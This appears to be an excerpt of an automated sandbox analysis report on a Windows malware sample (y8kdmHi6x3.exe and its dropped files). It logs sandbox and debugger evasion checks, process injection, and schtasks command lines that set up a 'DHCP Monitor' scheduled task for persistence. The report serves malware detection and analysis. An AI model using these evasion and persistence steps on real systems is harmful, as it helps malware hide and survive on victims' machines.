            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_0045A054
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_0045A104
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,9_2_0042C6FC
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_0044083C IsIconic,GetCapture,9_2_0044083C
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,9_2_0045695C
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,9_2_004410F0
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,9_2_00441A14
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0042E3B4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SYSTEM32.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, SYSTEM32.EXE, SYSTEM32.EXE, 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00435BD4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe TID: 6452 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\SYSTEM32.EXE TID: 6960 | Thread sleep time: -75000s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7084 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 5248 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 5344 | Thread sleep time: -40000s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 4940 | Thread sleep time: -240000s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1740 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7092 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE TID: 2824 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6388 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4588 | Thread sleep time: -480000s >= -30000s
            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4292 | Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_6-4350)
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Window / User API: foregroundWindowGot 710
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | API coverage: 8.2 %
            Source: C:\Users\user\Desktop\WINDOWS.EXE | API coverage: 7.7 %
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00435BD4
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCX831F.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCX788E.tmp
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00458EA4 GetCurrentThreadId,GetCursorPos,WaitForSingleObject
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00458EA4 GetCurrentThreadId,GetCursorPos,WaitForSingleObject
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 60000
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 60000
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.560111317.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.367194735.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.522432696.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.517789046.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.468815421.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.430401552.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.477896338.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.377858654.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.462811842.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, ._cache_WINDOWS.EXE, 0000000B.00000003.430006882.0000000000C45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWthernet (Kernel Debugger)
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445521373.000000000135F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00426548 GetSystemInfo
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00409B1C FindFirstFileA,GetLastError
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Code function: 6_2_003C2701 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Code function: 6_2_003C2701 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Code function: 6_2_003C4991 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Code function: 6_2_003C3BEC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\ProgramData\Synaptics\Synaptics.exe | Memory written: C:\ProgramData\Synaptics\Synaptics.exe base: 400000 value starts with: 4D5A
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Memory written: C:\ProgramData\Synaptics\Synaptics.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Process created: C:\Users\user\Desktop\y8kdmHi6x3.exe C:\Users\user\Desktop\y8kdmHi6x3.exe
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Process created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Process created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | Process created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Process created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\ProgramData\Synaptics\._cache_Synaptics.exe "C:\ProgramData\Synaptics\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject
            Source: ._cache_WINDOWS.EXE, 0000000B.00000003.539533200.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerection was forcibly closed by the remote host.
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004061D0 GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0040E088 GetLocaleInfoA,GetACP
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004062DC lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0040C964 GetLocaleInfoA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0040C9B0 GetLocaleInfoA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00406AC6 GetLocaleInfoA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00406AC8 GetLocaleInfoA
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_004061D0 GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0040E088 GetLocaleInfoA,GetACP
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_004062DC lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0040C964 GetLocaleInfoA
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0040C9B0 GetLocaleInfoA
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00406AC6 GetLocaleInfoA
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00406AC8 GetLocaleInfoA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Queries volume information: C:\Users\user\Desktop\y8kdmHi6x3.exe VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | Queries volume information: C:\Users\user\Desktop\SYSTEM32.EXE VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\ProgramData\Synaptics\Synaptics.exe VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\ProgramData\Synaptics\Synaptics.exe VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\ProgramData\Synaptics\Synaptics.exe VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0040B2D4 GetLocalTime
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0047E020 GetTimeZoneInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00472E58 GetUserNameA
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00446564 GetVersion

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
